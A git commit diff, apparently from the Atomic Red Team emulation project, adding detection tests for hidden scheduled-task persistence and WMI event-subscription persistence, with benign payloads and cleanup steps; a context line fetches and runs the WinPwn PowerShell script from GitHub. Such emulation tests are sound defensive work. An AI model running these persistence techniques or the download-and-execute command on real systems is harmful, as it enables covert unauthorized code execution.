Merge branch 'master' into master

2022-06-04 23:05:22 -04:00
parent df67a8aa4d d8f1820ef6
commit 89c697c951
5 changed files with 109 additions and 6 deletions
@@ -164,3 +164,18 @@ atomic_tests:
      schtasks /delete /tn "ATOMIC-T1053.005" /F >nul 2>&1
      reg delete HKCU\SOFTWARE\ATOMIC-T1053.005 /F >nul 2>&1
    name: command_prompt
+- name: Import XML Schedule Task with Hidden Attribute 
+  auto_generated_guid: cd925593-fbb4-486d-8def-16cbdf944bf4
+  description: |
+    Create an scheduled task that executes calc.exe after user login from XML that contains hidden setting attribute. 
+    This technique was seen several times in tricbot malware and also with the targetted attack campaigne the industroyer2.
+  supported_platforms:
+    - windows
+  executor:
+    name: powershell
+    elevation_required: true
+    command: |
+      $xml = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml")
+      Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
+    cleanup_command: |
+      Unregister-ScheduledTask -TaskName "atomic red team" -confirm:$false >$null 2>&1
@@ -0,0 +1,45 @@
+<?xml version="1.0" encoding="UTF-16"?>
+<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
+  <RegistrationInfo>
+    <Version>1.1.1</Version>
+    <Author>atomicredteam</Author>
+    <Description>atomic red team schedule task with hidden attribute</Description>
+    <URI>\atomic red team</URI>
+  </RegistrationInfo>
+  <Triggers>
+    <LogonTrigger>
+      <Enabled>true</Enabled>
+    </LogonTrigger>
+  </Triggers>
+  <Principals>
+    <Principal id="Author">
+      <RunLevel>LeastPrivilege</RunLevel>
+      <LogonType>InteractiveToken</LogonType>
+    </Principal>
+  </Principals>
+  <Settings>
+    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
+    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
+    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
+    <AllowHardTerminate>true</AllowHardTerminate>
+    <StartWhenAvailable>true</StartWhenAvailable>
+    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
+    <IdleSettings>
+      <StopOnIdleEnd>true</StopOnIdleEnd>
+      <RestartOnIdle>false</RestartOnIdle>
+    </IdleSettings>
+    <AllowStartOnDemand>true</AllowStartOnDemand>
+    <Enabled>true</Enabled>
+    <Hidden>true</Hidden>
+    <RunOnlyIfIdle>false</RunOnlyIfIdle>
+    <WakeToRun>false</WakeToRun>
+    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
+    <Priority>6</Priority>
+  </Settings>
+  <Actions Context="Author">
+    <Exec>
+      <Command>C:\Windows\system32\calc.exe"</Command>
+      <Arguments></Arguments>
+    </Exec>
+  </Actions>
+</Task>
@@ -275,4 +275,4 @@ atomic_tests:
      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
      generaldomaininfo -noninteractive -consoleoutput
-    name: powershell
+    name: powershell
@@ -1,7 +1,7 @@
 attack_technique: T1546.003
 display_name: 'Event Triggered Execution: Windows Management Instrumentation Event Subscription'
 atomic_tests:
- name: Persistence via WMI Event Subscription
+- name: Persistence via WMI Event Subscription - CommandLineEventConsumer
  auto_generated_guid: 3c64f177-28e2-49eb-a799-d767b24dd1e0
  description: |
    Run from an administrator powershell window. After running, reboot the victim machine.
@@ -16,13 +16,13 @@ atomic_tests:
  - windows
  executor:
    command: |
-      $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
+      $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example';
                      EventNameSpace='root\CimV2';
                      QueryLanguage="WQL";
                      Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
      $Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs

-      $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
+      $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example';
                      CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";}
      $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs

@@ -32,12 +32,53 @@ atomic_tests:
      }
      $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
    cleanup_command: |
-      $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
-      $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
+      $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example'"
+      $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example'"
      $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
      $FilterConsumerBindingToCleanup | Remove-WmiObject
      $EventConsumerToCleanup | Remove-WmiObject
      $EventFilterToCleanup | Remove-WmiObject
    name: powershell
    elevation_required: true
+- name: Persistence via WMI Event Subscription - ActiveScriptEventConsumer
+  auto_generated_guid: fecd0dfd-fb55-45fa-a10b-6250272d0832
+  description: |
+    Run from an administrator powershell window. After running, reboot the victim machine.
+    After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.

+    Code references
+
+    https://gist.github.com/mgreen27/ef726db0baac5623dc7f76bfa0fc494c
+
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example';
+                      EventNameSpace='root\CimV2';
+                      QueryLanguage="WQL";
+                      Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
+      $Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments $FilterArgs
+
+      $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example';
+                      ScriptingEngine='VBScript';
+                      ScriptText='
+                      Set objws = CreateObject("Wscript.Shell")
+                      objws.Run "notepad.exe", 0, True
+                      '}
+      $Consumer=Set-WmiInstance -Namespace "root\subscription" -Class ActiveScriptEventConsumer -Arguments $ConsumerArgs
+
+      $FilterToConsumerArgs = @{
+      Filter = $Filter;
+      Consumer = $Consumer;
+      }
+      $FilterToConsumerBinding = Set-WmiInstance -Namespace 'root/subscription' -Class '__FilterToConsumerBinding' -Arguments $FilterToConsumerArgs
+    cleanup_command: |
+      $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class ActiveScriptEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example'"
+      $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example'"
+      $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
+      $FilterConsumerBindingToCleanup | Remove-WmiObject
+      $EventConsumerToCleanup | Remove-WmiObject
+      $EventFilterToCleanup | Remove-WmiObject
+    name: powershell
+    elevation_required: true
@@ -1060,3 +1060,5 @@ ed0335ac-0354-400c-8148-f6151d20035a
 82a9f001-94c5-495e-9ed5-f530dbded5e2
 f3a10056-0160-4785-8744-d9bd7c12dc39
 6c499943-b098-4bc6-8d38-0956fc182984
+fecd0dfd-fb55-45fa-a10b-6250272d0832
+cd925593-fbb4-486d-8def-16cbdf944bf4